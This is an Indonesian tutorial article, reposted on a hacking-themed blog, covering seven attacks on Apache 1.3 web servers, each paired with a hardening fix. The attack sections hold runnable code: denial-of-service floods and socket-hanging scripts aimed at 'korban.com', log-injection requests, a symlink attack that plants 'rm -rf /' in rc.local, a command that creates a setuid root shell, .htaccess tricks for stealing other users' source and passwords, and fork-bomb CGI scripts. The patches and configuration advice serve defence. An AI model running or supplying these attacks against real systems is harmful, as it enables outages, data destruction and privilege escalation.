Tempat Hacking dan Cracking

Crashing Apache Dan Cara Menangkalnya

Crashing Apache Dan Cara Menangkalnya

Apache kena worm? Bukan. Tapi selalu ada bahaya lain yang siap mengintai jika kita lengah. Steven menunjukkan “lubang-lubang” dan solusinya.
Siapa yang bulan lalu tidak pernah mendengar tentang Code Red pastilah sedang hidup di dunia lain. Dan kini muncul pula Nimda. Anda-Anda para pengguna software webserver Apache boleh tertawa, karena pilihan Anda ini tidak rentan terhadap worm-worm tersebut. Anda, yang sebagian besar terdiri dari Linuxer dan pengikut BSD, mungkin hanya kesal karena ikut kebanjiran request string yang panjang-panjang, sehingga sebagian dari Anda harus me-rotate log lebih sering. Tapi jangan takabur, memakai Apache bukan berarti pasti lolos dari masalah, seperti yang akan kita bahas sesaat lagi.
Artikel ini merupakan yang pertama dari seri Hack, di mana penulis akan mengajak pembaca untuk bermain-main dengan sebuah sistem, tentu dengan tujuan untuk mengenalnya lebih dalam. Kadang topik dan gaya bahasannya akan sedikit nakal, sesuai konotasi nama serinya, namun percayalah semua ini demi tujuan edukatif. Apa pun yang terjadi akibat penerapan dari apa yang tertulis di sini, baik langsung maupun tak langsung, bukanlah tanggung jawab penulis. Anda harus setuju dulu sebelum melanjutkan. Tekan Cancel dan pilih halaman lain jika tidak setuju.
Risiko Layanan Publik
Kalau Anda buka toko, maka Anda membuka diri pada risiko kemalingan, dirampok, kerusuhan. Semua tentu sudah beberapa kali mendengar, bahkan pernah melihat kejadian seperti ini. Begitu mendengar Glodok Anda langsung menangkap kan?
Demikian juga dengan menyediakan layanan publik. Anda membuka saluran, port, lubang, untuk dunia luar. Anda menjajakan informasi. Anda mengizinkan semua orang untuk menggunakan, dan menyalahgunakan, layanan Anda.
Software server memegang peranan yang kritis dalam menentukan tingkat keamanan sistem Anda. Beruntunglah pada dasarnya Apache adalah software webserver yang amat aman. Keandalannya telah ditantang dan diuji oleh tak terhitung banyaknya orang, karena Apache sebuah software open source. Bahkan sebetulnya sebagian besar dari yang diutarakan di sini nanti adalah serangan DOS (denial of service) atau eksploitasi miskonfigurasi, dua isu yang tidak spesifik untuk Apache melainkan terkait dengan hakiki sebuah layanan publik atau masalah pada manusia. Bolong-bolong Apache lain yang misalnya disebabkan oleh buffer overflow akibat formulasi panjang URI tertentu atau bug pada logika kode, umumnya telah banyak ditemukan dan dibetulkan. Ini bukan berarti Apache selalu kebal dengan worm. Barangkali saja belum ada orang yang cukup iseng membuat modul yang sebenarnya kuda trojan, untuk disebarluaskan terutama di platform serba biner seperti Windows misalnya—meski kemungkinan besar akan sulit untuk bisa seheboh Code Red + IIS karena software yang terakhir ini dikemas bersama OS-nya sendiri. Jika Apache hidup makmur terus, suatu saat ini bisa saja terjadi. Tinggal masalah waktu. What can go wrong, will go wrong.
Versi Apache yang dibahas di sini adalah versi 1.x yang terbaru saat artikel ditulis, yaitu 1.3.20. Patch-patch yang disediakan penulis dibuat berdasarkan 1.3.14—versi yang dipakai penulis untuk sistem produksi—namun semua patch bisa dipakai untuk 1.3.20. Semua dicoba di Linux, jadi penulis tidak menjamin patch ini jalan di platform yang lain. Apache 2.0 tentu saja masih beta, belum dipakai secara luas, dan lagi belum terlalu penulis akrabi. Jadi tidak disinggung di sini.
Semua software dan patch yang dibahas disediakan dalam CD majalah, atau dapat didownload sendiri. Daftar URL-nya di akhir artikel.
Catatan: Tipe serangan remote berarti dilakukan lewat koneksi TCP/IP, dan tidak membutuhkan akses shell. Tentu saja tidak berarti harus di komputer yang berbeda. Sebaliknya, tipe serangan lokal membutuhkan akses lokal.
Cara 1: Brute Attack
Tipe serangan: remote, DOS.
Program-program benchmark WWW, selain dipakai untuk mengukur kinerja sesaat sebuah webserver, tentu dapat juga dipakai untuk mengirim banyak request secara simultan ke host target, dengan tujuan untuk meninggikan load mesin tujuan sedemikian rupa sehingga respon bagi klien lain menjadi amat lambat atau bahkan terhenti. Biasanya efek yang lebih diinginkan si penyerang adalah RAM menjadi habis sehingga mesin tak henti-henti melakukan swap. Ketimbang hanya menghabiskan CPU, efek swapping seperti ini umumnya lebih lama pulihnya, atau tak akan pernah pulih hingga mesin direboot.
Apache nampaknya tidak memiliki kemampuan mengatur load seperti IIS, sehingga akan terus mem-fork proses baru hingga nilai MaxClients tercapai atau hingga batas yang diizinkan oleh OS. Ini tentunya menguntungkan penyerang karena habisnya RAM akan lebih cepat tercapai.
Untuk lebih efektif menghabiskan CPU, Anda perlu memilih request mana yang kira-kira intensif CPU. Target yang umum adalah fasilitas search di situs ybs. Atau skrip CGI atau PHP yang kira-kira memerlukan cukup banyak pemrosesan, seperti mengakses database, dsb. Untuk lebih efektif menghabiskan RAM, Anda perlu mengira-ngira request yang akan menyebabkan Apache meluncurkan program lain yang besar. Server Apache yang menggunakan mod_perl cukup rentan karena ukuran proses httpd yang besar.
Banyak tool yang dapat dipakai untuk melakukan ini, antara lain ApacheBench (disertakan dalam distribusi Apache), http_load, httperf, atau berbagai tool komersial. Contoh berikut mengirimkan total 100000 request, paralel 200, ke sebuah host korban.
Shell
1
2
$ /usr/sbin/ab n 100000 c 200 \
http://korban.com/cgi-bin/search?q=kata+yang+cukup+umum
Opsi-opsi lain ApacheBench bisa dilihat di manpage-nya.
Tentu saja, lebih efektif melakukan serangan ini dari mesin yang sama atau jaringan lokal, karena waktu tunda karena latensi jaringan minimal. Jika mesin server yang diserang cukup bertenaga CPU besar, maka mungkin saja lebih lama waktu yang dihabiskan untuk mentransfer data dari program Anda dari/ke server. httperf memiliki opsi bagus untuk mengeset timeout. Kita dapat mengecilkan nilai ini agar sebelum server yang cepat itu memberi reply, kita sudah memutuskan koneksi karena timeout. Contoh:
Shell
1
2
3
$ httperf --hog --server korban.com --port 80 \
--uri /cgi-bin/search.cgi?q=bla+bla --rate 100 \
--timeout 0.001 --http-version 1.0
Pada contoh di atas, kita mengeset timeout ke nilai yang cukup kecil, 1 ms.
Solusi 1
Pada dasarnya serangan murni DOS seperti ini sulit diatasi, kecuali Anda melakukan tindakan identifikasi terhadap pelaku dan pemblokiran akses melalui firewall atau mekanisme kontrol akses Apache (Order, Allow from, Deny from).
Hal yang paling penting, pastikan RAM mesin Anda cukup untuk perkiraan beban yang diharapkan. Lakukan dulu simulasi dengan tool-tool benchmark sebelum orang lain melakukannya. Jika RAM Anda ternyata kurang, kecilkan juga MaxClients agar jika Apache Anda sibuk dan proses induknya beranak-pinak, maka memori Anda tidak habis semua untuk anak-anak Apache ini.
Terdapat juga satu modul Apache yang mungkin dapat membantu membatasi klien, yaitu mod_limitipconn. Modul ini mencatat IP klien-klien terakhir dan membatasi jumlah koneksi untuk tiap IP. Fungsionalitas seperti ini juga mudah dibuat jika Anda menguasai mod_perl atau mod_python misalnya.
Cara 2: Menggantung Soket
Tipe serangan: remote, DOS. Kadang disebut juga serangan tipe timeout.
Apache dikenal memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi bawaan yang diberikan oleh Apache Software Foundation maupun di distro-distro Linux adalah MaxClients sebesar 150. Ini berarti, hanya 150 koneksi yang diizinkan ke sebuah server Apache, atau maksimal 150 klien. Jumlah klien dapat sedikit banyak kurang dari angka tersebut, karena sebuah browser bisa saja mengirimkan 4 request simultan dengan koneksi terpisah-pisah.
Dibanding cara sebelumnya, cara menggantung soket ini lebih halus. Setelah konek, program benchmark kita hanya diam dan tidak melakukan apa-apa. Server Apache masih akan menunggu selama waktu yang ditentukan oleh direktif TimeOut (default 5 menit). Selama waktu tunda ini, soket TCP tetap “menggantung” dan tak dapat dipakai untuk klien lain. Jika kita mengirimkan request simultan cukup banyak, maka batasan klien maksimum Apache akan tercapai dan hasilnya, klien lain akan tertunda dan bila backlog TCP terlampaui, terjadi penolakan koneksi sehingga seolah-olah tampak server di seberang itu tewas.
Berikut salah satu cara sederhana menggantung soket di server:
Shell
1
2
3
4
5
6
7
8
perl -MIO::Socket -e'$|++;
for(1..1300){
$fh{$_}=new IO::Socket::INET
PeerAddr=>"korban.com",
PeerPort=>80,
Proto=>"tcp"
or die;print "$_\n"}
'
Lakukan dari beberapa login shell atau beberapa komputer untuk satu tujuan korban.com. Perhatikan apa yang terjadi. Selama Anda menggantung habis soket, klien lain akan sulit sekali mendapat respon dari Apache.
Solusi 2
Modul mod_limitipconn dapat dipakai pula di sini untuk membatasi IP penyerang membuat banyak koneksi sekaligus dengan server kita.
Perbesar kapasitas jumlah soket yang dapat dibuka simultan oleh OS. Di Linux, ini dilakukan dengan mengeset nilai-nilai di /proc/sys/fs/{file-max,inode-max}. Lihat dokumentasi Documentation/filesystems/proc.txt di source code Linux Anda untuk rinciannya. Nilai bawaan Linux memang cukup kecil. Anda sebaiknya memperbesar hingga 16k atau lebih.
Selain itu, cara-cara berikut dapat memperbesar ketersediaan koneksi TCP di server Anda. Intinya adalah jangan membiarkan koneksi jangka panjang berlama-lama.
Kecilkan nilai TimeOut. Menurut penulis lima menit memang kurang masuk akal bagi Apache. Kecilkan menjadi 1 menit saja. Situs supersibuk seperti Google misalnya, memiliki nilai timeout yang relatif rendah.
Bila server Anda juga sibuk dan koneksi simultan pun tinggi, maka ada baiknya mematikan KeepAlive untuk memperbesar ketersediaan koneksi TCP. Menyalakan KeepAlive memang meningkatkan kecepatan respon bagi klien, tapi ini meningkatkan jumlah soket yang “tergantung”. Anda dapat melihat dengan jelas di halaman status Apache.
Selain limit dari OS, limit dari Apache sendiri perlu ditingkatkan. Jumlah koneksi maksimum bawaan Apache 256. Ini dapat diperbesar tapi Anda perlu mengkompile ulang dan mengeset OS Anda agar mengizinkan sebuah proses beranak lebih dari jumlah tersebut. Demi mempersingkat artikel ini, penulis tidak akan membeberkan caranya secara rinci. Petunjuk: cari string HARD_SERVER_LIMIT di httpd.h.
Perkecil pula jumlah maksimum deskriptor file yang dapat diciptakan oleh user. Tambahkan baris ‘ulimit -n 32’ misalnya, di /etc/profile.
Salah satu cara lain yang populer untuk memperbesar kapasitas jumlah koneksi Apache adalah dengan memasang proxy depan. Squid misalnya, dalam mode accelerator http. Karena Squid modelnya proses tunggal dan menggunakan select(2), maka kapasitas Squid lebih besar dari Apache. Jadi Apache dilindungi dari klien-klien penggantung atau lambat. Klien-klien ini akan menggantung di proses Squid, bukan Apache. Juga karena keterbatasan ruang, ini tidak dibahas lebih lanjut.
Cara 3: Mengacaukan Statistik Web
Tipe serangan: remote, perusakan data, eksploit input.
Ada satu kelemahan Apache yang penulis rasakan, yaitu tidak memroses karakter kutip dalam string Referrer dan User-Agent yang dikirimkan oleh klien. Ini berarti klien dapat memformulasi inputnya secara hati-hati untuk merusak format baris log akses.
Jenis serangan ini tidak betul-betul berbahaya atau bahkan mengganggu kerja Apache, namun cukup menyebalkan karena dapat mengacaukan rata-rata software statistik Web. Berikut ini format log Apache combined (semua dalam satu baris):
Shell
1
2
11.11.11.11 - - [31/Aug/2001:02:01:56 +0700] "GET /index.shtml HTTP/1.1
+" 200 12152 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
Field-fieldnya, dipisahkan oleh spasi dan dapat dikutip, adalah sbb: host remote, remote logname (jika ada indentd), username (jika dikenai Basic Authentication), waktu request, baris pertama request, kode respon, jumlah byte di bodi respon (jika objek statik, sama dengan ukuran file yang dikirim), Referer, dan User-Agent. Definisinya bisa dilihat di baris LogFormat di httpd.conf.
Kutip ganda dalam baris request ternyata tidak di-filter atau di-escape. Maka kita dapat mengacaukan field-field berikutnya dengan memasukkan kutip ini. Terutama yang ingin kita isengi kali ini adalah jumlah byte di bodi respon.
Cobalah konek ke server target dan lakukan hal berikut:
Shell
1
2
3
4
5
6
7
$ telnet korban.com 80
Trying 22.22.22.22...
Connected to korban.com.
Escape character is '^]'.
GET / HTTP/1.0" 200 1000000000 "-
Host: korban.com
(tekan Enter sekali lagi)
Apa yang akan muncul di baris log server?
Shell
1
2
11.11.11.11 - - [31/Aug/2001:17:13:12 +0700] "GET / HTTP/1.0" 200 10000
+00000 "-" 200 14173 "-" "-"
Program-program statistik Web (termasuk Webalizer, WebTrends, dan Wusage yang telah penulis coba) mau bekerja dengan baris log ini dan menafsirkan jumlah byte respon di field ketujuh ciptaan kita dengan baik. Padahal sebetulnya jumlah byte respon tidak satu miliar byte, melainkan hanya sekitar 14k. Namun field asli telah tergeser ke field sepuluh. Ini berkat Apache yang meloloskan baris request nakal kita hingga ke file log.
Akibat dari perbuatan ini dapat bermacam-macam. Si pemilik situs senang karena situsnya sekilas terlihat ramai dikunjungi, bingung, atau sedih karena didenda ekstra oleh webhosternya.
Field kedua dan ketiga juga tidak dikutip dan bisa dimanipulasi. Silakan coba kombinasi request lain.
Program statistik Web Webalizer juga ternyata tidak melakukan HTML-escaping pada field username, sehingga kita bisa menyuntikkan kode-kode Javascript untuk menyebabkan serangan potensial cross-site scripting. Jika sebuah halaman Web mengeluarkan kotak dialog password, cobalah masukkan kode Javascript di field username. Tentu saja ini bukan kesalahan Apache.
Solusi 3
Patch Apache dengan avoid_nasty_characters_in_access_log.patch, lalu kompile ulang. Misalkan Anda memiliki tarball apache_1.3.20.tar.gz. Lakukan hal berikut:
Shell
1
2
3
4
5
6
$ tar xfz apache_1.3.20.tar.gz
$ cd apache_1.3.20
$ patch -p1 < \
../apache_1.3.14-avoid_nasty_characters_in_access_log.patch
$ ./configure (masukkan opsi-opsi Anda)
$ make all install
Cara melakukan patch lainnya nanti sama seperti ini. Patch yang penulis buat ini akan mengubah semua kutip ganda (“) yang terdapat dalam baris request—dan field-field rawan lainnya—menjadi kutip tunggal(‘), sehingga tidak mengganggu pembatas antarfield. Ada pendekatan lain yang bisa dilakukan, misalnya menghilangkan kutipnya sama sekali, atau meng-escape-nya menjadi \”, namun cara pertama yang menurut penulis paling sederhana dan kompatibel dengan program-program pengolah log.
Cara 4: Symlink Log
Tipe serangan: lokal, perusakan data, eksploit root.
Jika server Anda melayani banyak virtualhost milik user-user yang berbeda, umumnya tiap virtualhost diberi log akses dan log error sendiri. Misalnya ditaruh di /home/namauser/logs/access.log dan /home/namauser/logs/error.log. Jika Anda tidak berhati-hati, user dapat memanipulasi file log. Meskipun pemilik file log mungkin saja root, namun Anda perlu memperhatikan pemilik dari direktori /home/namauser/logs. Jika pemilik direktori logs/ adalah si user, maka user tetap dapat menghapus file-file log milik root tadi. Tidak percaya? Coba saja:
Shell
1
2
3
4
# cd /home/penjahat
# mkdir logs && chown penjahat.penjahat logs
# cd logs
# touch error.log
Sekarang, sebagai user penjahat, lakukan:
Shell
1
2
$ cd /home/penjahat/logs
$ rm error.log
Kok bisa begitu? Memang demikianlah sistem permission di Unix. Si pemilik direktori memang berhak menentukan file-file apa saja yang berada di dalamnya. Tentu saja si penjahat tidak boleh memodifikasi isi error.log, tapi menghapus atau mengganti namanya boleh.
Nah, bagaimana bila si penjahat menghapus error.log semula, lalu membuatnya jadi symlink ke file lain? Ingat, proses induk Apache umumnya berjalan sebagai root karena harus menambatkan diri ke port 80. Dan penulisan log dilakukan oleh proses induk! Ini berarti, si penjahat jadi dapat melakukan append ke file manapun di filesystem. Merusak database MySQL (symlink ke file .MYD atau .MYI misalnya), file /etc/passwd, log milik user lain, dsb. Kita tinggal menunggu admin melakukan kill -HUP atau me-restart Apache, maka file-file yang menjadi tujuan symlink akan dikotori oleh log akses atau log error. Ngeri ya?
Tadi ditulis bahwa serangan ini dapat menjadi eksploit root, bagaimana caranya? Pertama-tama, mari kita cari perintah standar di Unix yang merupakan skrip shell dan biasanya dijalankan oleh root. Syaratnya, skrip shell ini tidak boleh diakhiri dengan exec atau exit, agar jika kita menambahkan satu baris di akhir file, maka baris tersebut masih bisa dieksekusi. Penulis melihat sistem RedHat 6.2 dan mengamati file-file berikut memenuhi syarat:
Shell
1
2
3
4
/etc/rc.d/rc.local atau /etc/rc.d/rc.sysinit (akan dijalankan di awal boot sistem
/etc/cron.*/*
/usr/bin/groups
/bin/vimtutor, /usr/bin/autoconf, /usr/sbin/makewhatis, /usr/bin/zless, dst. (tidak selalu oleh root)
Sekarang, symlink-lah access.log ke salah satu file di atas—misalnya /etc/rc.d/rc.local—, tunggu sampai Apache atau seluruh sistem direstart. Setelah itu, lakukan hal berikut:
Shell
1
2
3
$ telnet localhost 80
GET "; rm -rf /; # HTTP/1.0
(tekan Enter sekali lagi)
Hasilnya, sebuah baris akan ditambahkan ke /etc/rc.d/rc.local. Sekarang kita perlu menunggu sekali lagi sampai server direboot. Atau jika Anda tak sabar, lakukan DOS hingga sistem terpaksa direboot. Baris terakhir di rc.local pada gilirannya akan dieksekusi.
Shell
1
2
127.0.0.1 - - [31/Aug/2001:17:13:12 +0700] "GET "; rm rf /; # HTTP/1.0
+" 200 14173 "-" "-"
Di mata shell, baris di atas terdiri dari tiga perintah yang dibatasi oleh tanda titik-koma. Perintah pertama tentu saja tidak berarti apa-apa bagi shell, malah mengakibatkan kesalahan. Tapi perintah kedua, rm -rf /, tentu semua orang sudah kenal kan?
Tentu saja menghapus seluruh filesystem kurang kreatif dan asyik, jadi perintah rm ini bisa kita ganti dengan perintah lain seperti (semua satu baris, sisipkan dalam request HTTP seperti yang sebelumnya):
Shell
1
2
echo -e '#!/usr/bin/perl\n;undef %ENV;$<=$>;$(=$);exec qq(/bin/bash);'
+ > /home/penjahat/.bash; chmod 4755 /home/penjahat/.bash
Perintah di atas akan membuat sebuah skrip setuid root di /home/penjahat/.bash. Sim salabim, akses root.
Solusi 4
Sudah jelas: jangan biarkan user dapat memanipulasi file log. Agar aman, jangan taruh file log di bawah direktori home user, karena direktori home user sudah pasti pemiliknya adalah si user.
Tidak ada ruginya menerapkan patch di Solusi 3, agar user tidak dapat seenaknya mengirimkan kutip penutup ke log akses.
Cara 5: Bermain-Main dengan .htaccess
Tipe serangan lokal, DOS, pencurian data.
Jika Anda memiliki akses lokal dan diperbolehkan menulis .htaccess sendiri, ada berbagai hal menarik yang bisa dicoba. .htaccess merupakan perpanjangan dari httpd.conf, yaitu konfigurasi Apache di tiap tingkat direktori.
Misalkan file-file situsku.com ditaruh sebagai milik user situsku di /home/situsku/www.
Apache tidak membatasi ukuran .htaccess, sehingga Anda dapat meluncurkan DOS dengan membuat file .htaccess yang besar.
Shell
1
2
$ cd /home/situsku/www
$ perl -e'print "# allow from all\n" x 200_000' > .htaccess
Baris di atas akan menulis sebuah file akses berukuran sekitar 3MB. Cobalah mengakses halaman depan situsku.com dari jaringan lokal. Jika respon menjadi lambat, maka permainan kita bisa berlanjut. Jika tidak, maka server telah dikonfigurasi untuk mengabaikan .htaccess.
Kita dapat melipatgandakan efek ini dengan membuat banyak tingkat direktori, atau loop direktori. Apache pun memperbolehkan .htaccess berupa symlink, sehingga kita dapat melakukan seperti ini:
Shell
1
2
3
4
$ cd /home/situsku/www
$ mkdir www2
$ cd www2
$ ln -s ../.htaccess .htaccess
Akses ke www2 akan semakin lambat karena Apache memroses dulu .htaccess di www/, baru ke www2. Demikian seterusnya.
Apache sebelum 1.2.5 belum mengecek tipe file .htaccess. Sehingga dapat diserang dengan DOS seperti berikut (contoh di bawah untuk .htpasswd):
Shell
1
2
3
4
AuthType Basic
AuthName DoS Attack
AuthUserFile /dev/zero
require valid-user
Ketika mencoba membaca file password dan mencari tanda titik dua pembatas username dan password, Apache akan tersesat di rimba nol selamanya, dan menghabiskan CPU dan RAM.
Apache setelah 1.2.5 mengecek hal ini, namun belum mengecek fifo atau pipa bernama. Kita dapat membuat .htaccess sebagai file pipa bernama:
Shell
1
$ mknod .htaccess p
Dan saat Apache mencoba membaca file akses ini, ia akan menunggu selamanya, karena tidak ada yang menulis ke pipa kita tadi. Masukkan URL ke direktori yang berisi pipa ini di browser berulang kali, maka proses Apache lama-lama akan habis karena masing-masing tergantung membaca .htaccess.
Berbagai kelemahan konfigurasi lain juga dapat dimanfaatkan melalui .htaccess. Misalnya, jika AllowOverride FileInfo aktif dan webserver memiliki mod_status, maka berikan .htaccess berikut untuk melihat halaman status Apache:
Shell
1
2
3
<Files /server-status>
SetHandler server-status
</Files>
Halaman status ini berguna untuk mengetahui tingkat kesibukan Apache Anda, dan juga bisa digunakan oleh penyerang agar lebih efektif dalam melakukan tugasnya.
Atau, jika Options FollowSymlinks hidup, Anda dapat melihat source code CGI/PHP user lain. Misalnya, user yang ingin diintip adalah korban. Perintah berikut dimasukkan oleh user penjahat.
Shell
1
2
3
4
5
6
7
$ cd /home/penjahat/www
$ mkdir korban; cd korban
$ ln -s /home/korban/www www
$ echo -e "
directoryindex none
sethandler default-handler
forcetype text/plain" > .htaccess
Akses direktori /home/penjahat/www/korban/www dari browser. Maka Anda akan melihat seluruh file www milik korban sebagai source. Anda dapat mencuri program yang berharga, password database, dsb.
Ada beberapa kombinasi menarik lainnya dalam bermain-main dengan .htaccess. Silakan cari dan temukan sendiri.
Solusi 5
Nomor satu, apakah Anda membutuhkan .htaccess? Jika tidak, matikan. AllowOverride None. Semua masalah beres. Bukan hanya sistem lebih aman dari user, kinerja Apache juga akan meningkat. Lanjut ke Cara 6.
Jika Anda perlu memberikan akses membuat .htaccess bagi user, maka terapkan patch ini: limit_htaccess.patch. Patch tersebut dapat membatasi kenakalan user dengan memperkenalkan tiga direktif baru.
LimitAccessFileSize, untuk membatasi ukuran maksimum .htaccess. Perhatikan bahwa nilai standarnya adalah 8k. Untuk mematikan pembatasan ukuran, berikan nilai 0.
LimitAccessFileType, untuk membatasi jenis file yang diperbolehkan. Misalnya, kita hanya mengizinkan file biasa dan tidak pipe, soket, device, atau bahkan symlink. Maka tambahkan baris LimitAccessFileType regular ke httpd.conf Anda.
LimitAccessFileToRoot, untuk mewajibkan .htaccess dimiliki root. Ini berarti, Apache tetap dapat menjalankan .htaccess, tapi si user tidak diperbolehkan membuatnya sendiri. Anda dapat membuat antarmuka Web semacam control panel misalnya, agar user dapat membuat .htaccess, tapi hanya perintah-perintah tertentu saja dalam jumlah terbatas.
Berikan juga direktif Options -FollowSymlinks jika Anda ingin mencegah orang agar tidak dapat membuat loop direktori.
Seleksi perintah-perintah yang boleh diberikan di .htaccess melalui direktif AllowOverride. Misalnya, jika Anda menggunakan mod_perl, sangat tidak dianjurkan menghidupkan AllowOverride FileInfo, karena si user dapat membuat .htaccess untuk menjalankan handler Perl sendiri, yang berjalan sebagai user Apache dan memiliki akses ke isi perut webserver.
Cara 6: Membuat Skrip DOS
Tipe serangan: lokal, DOS.
Pada dasarnya mirip dengan cara pertama, namun kini Anda memiliki kebebasan untuk membuat skrip yang bisa dengan cepat menghabiskan resource. Tentu saja Anda perlu diizinkan membuat skrip CGI atau PHP sendiri. Satu yang paling sederhana, fork bomb, untuk memenuhi tabel proses dan menghabiskan RAM:
Shell
1
2
#!/usr/bin/perl
fork while 1;
Atau, mari habiskan CPU:
Shell
1
2
3
#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i;
Atau, mari habiskan deskriptor file:
Shell
1
2
#!/usr/bin/perl
while (++$i) { open $f{$i}, "/bin/ls"; }
Atau, mari habiskan memori lebih cepat:
Shell
1
2
3
#!/usr/bin/perl
for (1..20) { fork or last }
while (++$i) { $h{$i} = "X" x 0xff; }
Panggillah skrip ini beberapa kali dari browser agar lebih terasa efeknya.
Sebetulnya serangan pun dapat remote, asalkan kita menemukan skrip bodoh yang bisa dimanfaatkan untuk menyuntikkan skrip kita ini menembus shell atau interpreter Perl/PHP.
Solusi 6
Ada patch bagi Linux yang berguna untuk mendeteksi ledakan proses anak dan segera mematikan proses induknya. Anda bisa mencarinya di Freshmeat, Fork Bomb Defuser. Namun hati-hati jika skrip Anda berjalan di dalam proses Apache (mod_php, mod_perl), sebab dapat dimanfaatkan oleh si penyerang untuk justru membunuh Apache itu sendiri.
Kenakan pembatasan resource pada skrip-skrip CGI. Lihatlah dokumentasi Apache untuk direktif-direktif berikut: LimitRequestBody, LimitRequestFields, LimitRequestFieldSize, LimitRequestLine, RLimitCPU, RLimitMEM, RLimitNPROC.
Jika server Anda dipakai oleh banyak user, lebih baik wrap eksekusi CGI agar risiko ditanggung oleh tiap user, bukan oleh user Apache Anda semata. Jalankan PHP dengan safe_mode dan safe_mode_exec_dir.
Karena tindakan DOS seperti ini amat menyebalkan dan murahan, tegaskan bahwa Anda amat tidak menyukai tindakan ini, dan kenakan sanksi yang berat pada user yang, baik iseng maupun dengan sengaja, melakukan kegiatan DOS seperti ini.
Cara 7: Memenuhi Log
Tipe serangan remote atau lokal, DOS, memenuhi disk.
Root di Unix secara bawaan tidak terbatas aksesnya, termasuk tidak dikenai kuota disk, dsb. Lewat skrip CGI, kita dapat mengalirkan data agar kepada root sehingga ditulis file log error misalnya.
Shell
1
2
#!/usr/bin/perl
print STDERR "X" x (1024*1024);
Program CGI pendek di atas, jika dijalankan lewat webserver, akan mengirim 1MB data ke log error. Lakukan berulang kali, maka Anda bisa membayangkan apa yang akan terjadi.
Serangan ini juga bisa dilakukan secara remote, dengan mengirim baris request, header User-Agent dan Referer yang panjang-panjang; semua ini umumnya akan bermuara di log akses. Namun tentu serangan lokal lebih efisien.
Solusi 7
Yang pasti, pertama-tama pisahkan partisi log Anda dari yang lain, agar jika log penuh—sesuatu hal yang sering terjadi—maka aktivitas lainnya tidak terhenti begitu saja.
Seperti biasa, tindakan DOS seperti ini agak dilematis untuk diatasi. Anda bisa mematikan error_log sama sekali, atau mengeset LogLevel ke tingkat crit ke atas, tapi itu berarti Anda akan kehilangan pemberitahuan even-even lainnya. Atau Anda dapat melempar stderr ke stdout—seperti yang dilakukan oleh cgiwrap—tapi konsekuensinya pemakaian bandwidth sedikit meningkat: pesan dari stderr ke disk kini berpindah ke jaringan, serta dapat membocorkan informasi seperti password database.
Anda dapat mengeset file log error agar dimiliki oleh user, bukan root, agar terkena kuota dan terbatasi ukurannya. Namun ini berarti direktori penampung file log tersebut jangan boleh bisa ditulisi oleh si user, agar tidak bisa diisengi ala Cara 4.
Atau Anda dapat mengeset pemilik log error sebagai user khusus lain yang diberi kuota.
Jika Anda memahami C dan source code Apache, bisa pula mencoba membatasi ukuran log yang dapat diproduksi per skrip atau per jangka waktu tertentu, meski tentunya ini pun berarti user Anda kehilangan sebagian informasi.
Penutup
Pada dasarnya DOS sulit diatasi, tapi jangan biarkan server Anda dapat diobok-obok dengan mudah. Jangan biarkan kesalahan atau kelemahan konfigurasi membuat data milik user Anda dapat dicuri. Yakinkan RAM cukup, atau jangan biarkan Apache menghabiskan seluruh RAM Anda. Jika Anda membuat skrip sendiri, ada sekumpulan jebakan yang sering mengenai programer pemula, jadi jangan lupa untuk membaca WWW Security FAQ. Yang paling penting, seperti orang Tegal bilang, know thy tools.
Bulan depan kita akan membahas trik-trik jitu meningkatkan pageview.
Rujukan
http_load: www.acme.com/software/http_load/
httperf: www.hpl.hp.com/personal/David_Mosberger/httperf.html
mod_limitipconn: dominia.org/djao/limitipconn.html
Security Tips Apache: httpd.apache.org/docs/misc/security_tips.html
WWW Security FAQ: www.w3.org/Security/Faq/
Patch-patch Apache: steven.haryan.to/apache/apache_1.3.14-limit_htaccess.patch, steven.haryan.to/apache/apache_1.3.14-avoid_nasty_characters_in_access_log.patch



share this article to: Facebook Twitter Google+ Linkedin Technorati Digg
Posted by Mubasir Alamsah, Published at 21:43 and have 0 komentar

No comments:

Post a Comment

Blog ini merupakan Blog Dofollow, karena beberapa alasan tertentu, sobat bisa mencari backlink di blog ini dengan syarat :
1. Tidak mengandung SARA
2. Komentar SPAM dan JUNK akan dihapus
3. Tidak diperbolehkan menyertakan link aktif
4. Berkomentar dengan format (Name/URL)